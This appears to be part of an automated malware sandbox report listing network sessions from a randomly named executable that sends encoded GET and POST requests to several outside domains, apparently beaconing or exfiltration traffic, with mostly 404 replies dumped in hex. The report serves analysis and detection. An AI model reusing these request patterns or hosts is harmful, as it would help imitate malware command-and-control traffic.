Nov 4, 2024 04:17:39.585764885 CET	1098	IN	Data Raw: 5a 77 49 92 db f1 76 14 6c 75 8e d3 cf 4e 2b ee e0 21 87 05 87 03 28 fa e1 f2 7e 78 42 15 49 39 42 7b 77 07 12 a6 43 12 a3 e1 b8 55 4d 4f 21 f3 1d 63 23 3e 34 9d 85 33 33 54 0a aa 20 1a 74 57 34 ce be b2 ce 39 3a 5a 2d d9 85 b7 cb 73 39 14 b8 51 Data Ascii: ZwIvluN+!(~xBI9B{wCUMO!c#>433T tW49:Z-s9Q>Yd)e'BvP4NBC4V`W>p.&XoydSW4z?SJa6LZM20BfC,Z\u3P5L udN"GsFErN5J!@Ml

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49976	66.29.146.14	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:41.419145107 CET	485	OUT	GET /sciu/?C4NDALSx=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLaTFYxZnfOv9cXS3nSZaLDRiuTmF2RHg/Rxj+O5CgW7JmZlVhRI=&CR=QnXHBNIHO HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:17:42.132819891 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Mon, 04 Nov 2024 03:17:42 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2772<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 4, 2024 04:17:42.132832050 CET	212	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
Nov 4, 2024 04:17:42.132848978 CET	1236	IN	Data Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0;
Nov 4, 2024 04:17:42.132860899 CET	1236	IN	Data Raw: 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 Data Ascii: fo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
Nov 4, 2024 04:17:42.132872105 CET	1236	IN	Data Raw: 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b Data Ascii: er address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
Nov 4, 2024 04:17:42.132889986 CET	636	IN	Data Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
Nov 4, 2024 04:17:42.133025885 CET	1236	IN	Data Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
Nov 4, 2024 04:17:42.133039951 CET	212	IN	Data Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4R
Nov 4, 2024 04:17:42.133064985 CET	1236	IN	Data Raw: 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 Data Ascii: URFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGX
Nov 4, 2024 04:17:42.133102894 CET	1236	IN	Data Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 Data Ascii: } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code"
Nov 4, 2024 04:17:42.138015032 CET	616	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 73 65 72 76 65 72 22 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 Data Ascii: <li class="info-server"></li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49988	66.29.146.173	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:47.250545025 CET	759	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 61 2b 72 73 59 67 31 2b 70 64 74 78 4d 4f 73 45 56 77 4c 4f 61 4e 4c 33 6b 51 72 78 50 6e 46 38 4b 54 4d 53 41 72 6e 46 42 4e 38 6f 52 44 76 6a 61 44 38 61 77 2b 48 71 2b 50 6a 6f 43 55 45 47 62 70 6f 6d 4b 6f 69 30 4a 52 38 59 48 46 50 52 59 7a 7a 72 52 74 54 55 41 2b 75 75 44 49 39 4e 78 61 57 37 41 51 50 43 32 66 4b 42 6d 38 42 36 33 4f 70 74 6b 4e 58 55 78 70 34 46 31 62 54 4d 57 30 78 58 61 4f 4d 31 45 76 79 6d 32 7a 65 34 72 50 36 4c 47 32 6b 36 37 4b 78 43 6c 78 79 70 58 39 78 43 6f 39 75 4f 66 4b 74 61 63 59 6d 67 68 4d 59 63 64 45 2b 70 73 4f 47 37 67 6a 7a 38 Data Ascii: C4NDALSx=HW3TOELLk8Vna+rsYg1+pdtxMOsEVwLOaNL3kQrxPnF8KTMSArnFBN8oRDvjaD8aw+Hq+PjoCUEGbpomKoi0JR8YHFPRYzzrRtTUA+uuDI9NxaW7AQPC2fKBm8B63OptkNXUxp4F1bTMW0xXaOM1Evym2ze4rP6LG2k67KxClxypX9xCo9uOfKtacYmghMYcdE+psOG7gjz8
Nov 4, 2024 04:17:47.965979099 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 04 Nov 2024 03:17:47 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 4, 2024 04:17:47.965993881 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49989	66.29.146.173	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:49.797540903 CET	783	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 62 64 7a 73 64 42 31 2b 73 39 74 79 56 75 73 45 63 51 4c 4b 61 4e 48 33 6b 52 75 71 50 56 78 38 4b 32 67 53 42 76 7a 46 45 4e 38 6f 65 6a 76 71 56 6a 38 52 77 2b 4c 59 2b 4f 50 6f 43 55 41 47 62 73 73 6d 4b 62 4b 31 49 42 38 61 50 6c 50 54 48 44 7a 72 52 74 54 55 41 2b 71 45 44 4d 70 4e 78 71 6d 37 43 79 6e 46 31 66 4b 43 6c 38 42 36 7a 4f 70 70 6b 4e 58 32 78 6f 6c 71 31 5a 62 4d 57 30 42 58 61 63 30 30 65 2f 7a 4d 37 54 66 56 74 50 4b 50 4f 6e 46 39 39 63 68 6c 77 57 75 52 62 72 73 59 30 4f 75 74 4e 61 4e 59 63 61 2b 53 68 73 59 32 66 45 47 70 2b 5a 4b 63 76 58 57 66 6a 74 71 76 71 2b 79 69 4c 2f 71 68 49 44 2b 4d 2f 36 4d 66 66 67 3d 3d Data Ascii: C4NDALSx=HW3TOELLk8VnbdzsdB1+s9tyVusEcQLKaNH3kRuqPVx8K2gSBvzFEN8oejvqVj8Rw+LY+OPoCUAGbssmKbK1IB8aPlPTHDzrRtTUA+qEDMpNxqm7CynF1fKCl8B6zOppkNX2xolq1ZbMW0BXac00e/zM7TfVtPKPOnF99chlwWuRbrsY0OutNaNYca+ShsY2fEGp+ZKcvXWfjtqvq+yiL/qhID+M/6Mffg==
Nov 4, 2024 04:17:50.514214993 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 04 Nov 2024 03:17:50 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Nov 4, 2024 04:17:50.514235973 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49990	66.29.146.173	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:17:52.344644070 CET	1796	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 62 64 7a 73 64 42 31 2b 73 39 74 79 56 75 73 45 63 51 4c 4b 61 4e 48 33 6b 52 75 71 50 56 70 38 4b 67 30 53 41 49 66 46 44 4e 38 6f 58 44 76 76 56 6a 38 41 77 36 6e 63 2b 4f 7a 34 43 52 63 47 59 4f 6b 6d 4d 71 4b 31 43 42 38 61 44 46 50 51 59 7a 79 2f 52 74 44 51 41 2b 61 45 44 4d 70 4e 78 73 71 37 47 67 50 46 35 2f 4b 42 6d 38 42 32 33 4f 70 42 6b 4e 65 55 78 6f 78 41 31 70 37 4d 57 55 52 58 59 70 67 30 47 76 7a 4f 38 54 66 4e 74 50 48 52 4f 6e 5a 58 39 63 39 62 77 52 47 52 65 4b 56 45 77 64 65 45 52 35 68 53 4c 35 43 71 74 62 51 63 66 6d 43 79 2b 49 47 53 79 44 6d 57 71 49 6e 30 76 75 7a 32 4d 70 4b 59 41 44 44 37 32 61 6c 67 4e 78 66 2b 55 2f 68 6c 6e 4e 6f 6e 62 51 38 62 6d 49 36 79 33 5a 55 69 55 41 61 35 45 45 6a 76 33 52 56 4f 67 72 54 4f 74 76 4a 72 55 73 56 57 65 46 35 30 4f 54 4d 52 52 59 76 6b 72 67 35 33 65 35 74 66 2f 72 33 66 38 74 6a 50 78 79 50 33 64 37 35 53 6d 37 54 75 52 74 35 4f 70 50 42 41 45 6a 31 65 6e 77 43 6d 45 [TRUNCATED] Data Ascii: C4NDALSx=HW3TOELLk8VnbdzsdB1+s9tyVusEcQLKaNH3kRuqPVp8Kg0SAIfFDN8oXDvvVj8Aw6nc+Oz4CRcGYOkmMqK1CB8aDFPQYzy/RtDQA+aEDMpNxsq7GgPF5/KBm8B23OpBkNeUxoxA1p7MWURXYpg0GvzO8TfNtPHROnZX9c9bwRGReKVEwdeER5hSL5CqtbQcfmCy+IGSyDmWqIn0vuz2MpKYADD72algNxf+U/hlnNonbQ8bmI6y3ZUiUAa5EEjv3RVOgrTOtvJrUsVWeF50OTMRRYvkrg53e5tf/r3f8tjPxyP3d75Sm7TuRt5OpPBAEj1enwCmE8ZY8eX03Pdj1b9X1zHRyjwYokfl195Owp2B/erGj/dV2g5ePAt5z7rmjR+unWsRfqBmo8UBrpT2SJNnYWdjAHYH/MqzI9A7V2Tj3PQvUAv+X5Jwj7Fdy9ihtcrUV6x8aH1MNyX4vVRu9/OTgAtFa8xnEAgNMFKWPkRf5ZIjbDXbx6lQ9Mtv+vh0xGrynoy7S+OHai+dHSX+xHiOaHedEAAlIS8K97XQzRCfJeeXlHhwUAl4WIxi9bP0KmdHie9FSGrqAp5SgxChftDPBec+jqZ2pk2gRK18uiBZaH0XYeTu6gMC/lTjGyqFDLRNC8vihkyL2UEx8FynCbZau4dx9oaC1Jo6wkukYtQIVXsuhnueuRc3zb0Ys7HaHsJJMa2EslS6YfEv4a3Ua3xFxte1fMX//cqasShgT5lr+yaiRZuwh6f1unmI2L8E6WB4VJUaITD4b6G3cE+v7owToGEuWwthuxNZJ5peqrZuseDf93ZuHKd9XMB1EhOpO2hB3ERyooVDbWS2k/M7ef2OR/Q+AuioEoILBVqaPQKSsru8gxkFFbcUxy8IKhP6d7LXBi4rkjVbul1qGkFoYFlfY6s+C+c2/jDXvPijvAGHngnWXWhOX1WbsRRl8SWNpOTbV3qFF2zvW6r9qRMOGh60mbGmeTE2lApq/EqohB4 [TRUNCATED]
Nov 4, 2024 04:17:53.050925016 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 04 Nov 2024 03:17:52 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 